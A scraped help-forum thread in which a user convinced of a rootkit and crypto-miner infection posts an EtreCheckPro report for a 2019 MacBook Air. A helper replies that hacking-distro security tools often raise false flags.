Posted 11 September 2023 - 09:16 PM
Posted 11 September 2023 - 10:21 PM
how did you get rid of your pesky crypto miner? here's logs from etrecheck
EtreCheckPro version: 6.8.1 (68024)
Report generated: 2023-09-11 22:11:11
Download EtreCheckPro from https://etrecheck.com
Runtime: 5:08
Performance: Below Average
Problem: Other problem
Description:
I ran rkhunter and spent days looking at all files and I’m positive I
have a Rootkit its modified my kernel modules
Major Issues:
Anything that appears on this list needs immediate attention.
Heavy CPU usage - Some processes are using an unusually high amount of CPU.
Minor Issues:
These issues do not need immediate attention but they may indicate future problems or opportunities for improvement.
No Time Machine backup - Time Machine backup not found.
Runaway user process - A user process is using a large percentage of your CPU.
Low performance - EtreCheck report took an unusually long time to run.
Limited permissions - More information may be available with Full Disk Access.
Hardware Information:
MacBook Air (Retina, 13-inch, 2019)
Status: Supported
MacBook Air Model: MacBookAir8,2
1.6 GHz Dual-Core Intel Core i5 (i5-8210Y) CPU: 2-core
8 GB RAM - Not upgradeable
BANK 0/DIMM0 - 4 GB LPDDR3 2133
BANK 1/DIMM0 - 4 GB LPDDR3 2133
Battery: Health = Normal - Cycle count = 489
Video Information:
Intel UHD Graphics 617 - VRAM: 1536 MB
Color LCD (built-in) 2880 x 1800
Drives:
disk0 - APPLE SSD AP0128N 121.33 GB (Solid State - TRIM: Yes)
Internal PCI-Express 8.0 GT/s x4 NVM Express
disk0s1 - EFI [EFI] 315 MB
disk0s2 [APFS Container] 121.02 GB
disk1 [APFS Virtual drive] 121.02 GB (Shared by 6 volumes)
disk1s1 - A******** - Data (APFS) [APFS Virtual drive] (4.69 GB used)
disk1s2 - Preboot (APFS) [APFS Preboot] (1.86 GB used)
disk1s3 - Recovery (APFS) [Recovery] (1.15 GB used)
disk1s4 (APFS) [APFS Container] (9.17 GB used)
disk1s4s1 - A******D (APFS) [APFS Snapshot] (9.17 GB used)
disk1s5 - Update (APFS) (1 MB used)
disk1s6 - VM (APFS) [APFS VM] (20 KB used)
Mounted Volumes:
disk1s1 - A******** - Data [APFS Virtual drive]
Filesystem: APFS
Mount point: /System/Volumes/Data
Encrypted
Used: 4.69 GB
Shared values
Size: 121.02 GB
Free: 104.03 GB
disk1s2 - Preboot [APFS Preboot]
Filesystem: APFS
Mount point: /System/Volumes/Preboot
Used: 1.86 GB
Shared values
Size: 121.02 GB
Free: 104.03 GB
disk1s4s1 - A******D [APFS Snapshot]
Filesystem: APFS
Mount point: /
Read-only: Yes
Used: 9.17 GB
Shared values
Size: 121.02 GB
Free: 104.03 GB
disk1s5 - Update
Filesystem: APFS
Mount point: /System/Volumes/Update
Used: 1 MB
Shared values
Size: 121.02 GB
Free: 104.03 GB
disk1s6 - VM [APFS VM]
Filesystem: APFS
Mount point: /System/Volumes/VM
Used: 20 KB
Shared values
Size: 121.02 GB
Free: 104.03 GB
Network:
Interface en0: Wi-Fi
System Software:
macOS Ventura 13.5.2 (22G91)
Time since boot: Less than an hour
Security:
Gatekeeper: App Store and identified developers
System Integrity Protection: Enabled
Antivirus software: Apple
Applications:
406 apps
3 x86-only apps
2 unsigned apps
System Launch Daemons:
[Not Loaded] 37 Apple tasks
[Loaded] 197 Apple tasks
[Running] 152 Apple tasks
[Other] 2 Apple tasks
System Launch Agents:
[Not Loaded] 20 Apple tasks
[Loaded] 225 Apple tasks
[Running] 150 Apple tasks
App Extensions:
QuickLook Previews:
EtreCheckQuickLook - ~/Downloads/EtreCheckPro.app
com.etresoft.etrecheck4 *.etrecheck
Backup:
Time Machine Not Configured!
Performance:
System Load: 10.17 (1 min ago) 4.98 (5 min ago) 2.96 (15 min ago)
Nominal I/O usage: 4.44 MB/s
File system: 33.51 seconds
Write speed: 329 MB/s
Read speed: 1071 MB/s
CPU Usage Snapshot:
Type Overall
System: 21 %
User: 5 %
Idle: 74 %
Top Processes Snapshot by CPU:
Process (count) CPU (Source - Location)
find (2) 121.77 % (Apple)
tccd (2) 11.24 % (Apple)
WindowServer 10.08 % (Apple)
EtreCheckPro 6.66 % (Etresoft, Inc.)
trustd (4) 6.12 % (Apple)
Top Processes Snapshot by Memory:
Process (count) RAM usage (Source - Location)
EtreCheckPro 746 MB (Etresoft, Inc.)
kernel_task 313 MB (Apple)
com.apple.WebKit.WebContent (3) 266 MB (Apple)
AppleSpell 151 MB (Apple)
MTLCompilerService (7) 122 MB (Apple)
Top Processes Snapshot by Network Use:
Process Input / Output (Source - Location)
mDNSResponder 55 KB / 41 KB (Apple)
remoted 33 KB / 40 KB (Apple)
SubmitDiagInfo 67 KB / 949 B (Apple)
biometrickitd 28 KB / 24 KB (Apple)
corekdld 293 B / 28 KB (Apple)
Top Processes Snapshot by Energy Use:
Process (count) Energy (0-100) (Source - Location)
find (2) 35 (Apple)
WindowServer 2 (Apple)
Terminal 0 (Apple)
launchd 0 (Apple)
ContinuityCaptureAgent 0 (Apple)
Virtual Memory Information:
Physical RAM: 8 GB
Free RAM: 1.06 GB
Used RAM: 4.53 GB
Cached files: 2.41 GB
Available RAM: 3.47 GB
Swap Used: 0 B
Software Installs (past 60 days):
Install Date Name (Version)
2023-09-11 macOS 13.5.2 (13.5.2)
2023-09-11 Command Line Tools for Xcode (14.3)
Diagnostics Information (past 7-30 days):
2023-09-11 17:04:25 /Library/Logs/DiagnosticReports/ProxiedDevice-Bridge/recoverylogd-2023-09-11-170425.ips - Crash (2 times)
2023-09-11 16:42:07 /Library/Logs/DiagnosticReports/ProxiedDevice-Bridge/recoverylogd-2023-09-11-164207.ips - Crash (2 times)
2023-09-11 16:27:54 /Library/Logs/DiagnosticReports/ProxiedDevice-Bridge/recoverylogd-2023-09-11-162754.ips - Crash (2 times)
2023-09-11 16:10:59 /Library/Logs/DiagnosticReports/ProxiedDevice-Bridge/recoverylogd-2023-09-11-161059.ips - Crash (2 times)
2023-09-11 15:33:35 /Library/Logs/DiagnosticReports/ProxiedDevice-Bridge/recoverylogd-2023-09-11-153335.ips - Crash (2 times)
End of report
Posted 11 September 2023 - 10:32 PM
Again, what makes you think that there is a infection? You do realize that Parrot OS is created for hacking and hardening testing. https://www.guru99.com/best-os-hacking.html#:~:text=Parrot%20OS%20is%20a%20platform,%2C%20computer%20forensics%2C%20and%20more.
Posted 11 September 2023 - 10:51 PM
yes I do!! and because of all the things that been happing not only on parrot os but like I said iOS pdf books I had uploaded to virus total and I saw a visual map of the networks it connected back to, one of them was highlighted red and said malicious. my Mac OS has the same problems there are virtual disks that I never put there. I never stared a server ether what more would you like !!? or does not anyone know how to remove these things I stated ,,LKM trojan the variant type A trojan and a ADM worm is what's being reported from tools..
Bleepin Madman
Posted 12 September 2023 - 04:31 AM
US Navy Veteran from 2002 to 2006
Masters in Computer and Digital Forensics Expert - Stevenson University Alumni 2015
Arch Desktop - https://termbin.com/epij
Arch Laptop - https://www.termbin.com/dnwk
Ubuntu Server - https://termbin.com/zvra
Posted 13 September 2023 - 06:21 AM
Bleepin Madman
Posted 13 September 2023 - 10:45 AM
US Navy Veteran from 2002 to 2006
Masters in Computer and Digital Forensics Expert - Stevenson University Alumni 2015
Arch Desktop - https://termbin.com/epij
Arch Laptop - https://www.termbin.com/dnwk
Ubuntu Server - https://termbin.com/zvra
Posted 13 September 2023 - 01:23 PM
yes I do!! and because of all the things that been happing not only on parrot os but like I said iOS pdf books I had uploaded to virus total and I saw a visual map of the networks it connected back to, one of them was highlighted red and said malicious. my Mac OS has the same problems there are virtual disks that I never put there. I never stared a server ether what more would you like !!? or does not anyone know how to remove these things I stated ,,LKM trojan the variant type A trojan and a ADM worm is what's being reported from tools..
Of course you are going to get false flags that there is a infection with a distro directed at hacking and hardening.
Posted 16 September 2023 - 06:40 AM
this is my process on Mac OS air launchctl print system
also I used knockknock app to see process and looked up via virus total this is one one the many issues where I find some signs of things connected back to or connections that are malware
Posted 16 September 2023 - 02:59 PM
yes I do!! and because of all the things that been happing not only on parrot os but like I said iOS pdf books I had uploaded to virus total and I saw a visual map of the networks it connected back to, one of them was highlighted red and said malicious. my Mac OS has the same problems there are virtual disks that I never put there. I never stared a server ether what more would you like !!? or does not anyone know how to remove these things I stated ,,LKM trojan the variant type A trojan and a ADM worm is what's being reported from tools..
Of course you are going to get false flags that there is a infection with a distro directed at hacking and hardening.
its. not just that system its spread threw all my systems I know whats happing I'm not question that, how is my issue rn thank you
Bleepin Madman
Posted 16 September 2023 - 03:04 PM
this is my process on Mac OS air launchctl print system
https://dpaste.com/GBZGAYNCJ
also I used knockknock app to see process and looked up via virus total this is one one the many issues where I find some signs of things connected back to or connections that are malware
https://www.virustotal.com/gui/file/0cb5352ac33727fd7979e454f6ac1a56b7795a8ab5a25d7cc955133fb47cf9c4/detection
US Navy Veteran from 2002 to 2006
Masters in Computer and Digital Forensics Expert - Stevenson University Alumni 2015
Arch Desktop - https://termbin.com/epij
Arch Laptop - https://www.termbin.com/dnwk
Ubuntu Server - https://termbin.com/zvra
Bleepin Madman
Posted 16 September 2023 - 03:06 PM
US Navy Veteran from 2002 to 2006
Masters in Computer and Digital Forensics Expert - Stevenson University Alumni 2015
Arch Desktop - https://termbin.com/epij
Arch Laptop - https://www.termbin.com/dnwk
Ubuntu Server - https://termbin.com/zvra
Posted 17 September 2023 - 10:57 AM
Bleepin Madman
Posted 17 September 2023 - 11:01 AM
US Navy Veteran from 2002 to 2006
Masters in Computer and Digital Forensics Expert - Stevenson University Alumni 2015
Arch Desktop - https://termbin.com/epij
Arch Laptop - https://www.termbin.com/dnwk
Ubuntu Server - https://termbin.com/zvra
0 members, 1 guests, 0 anonymous users
Back to top
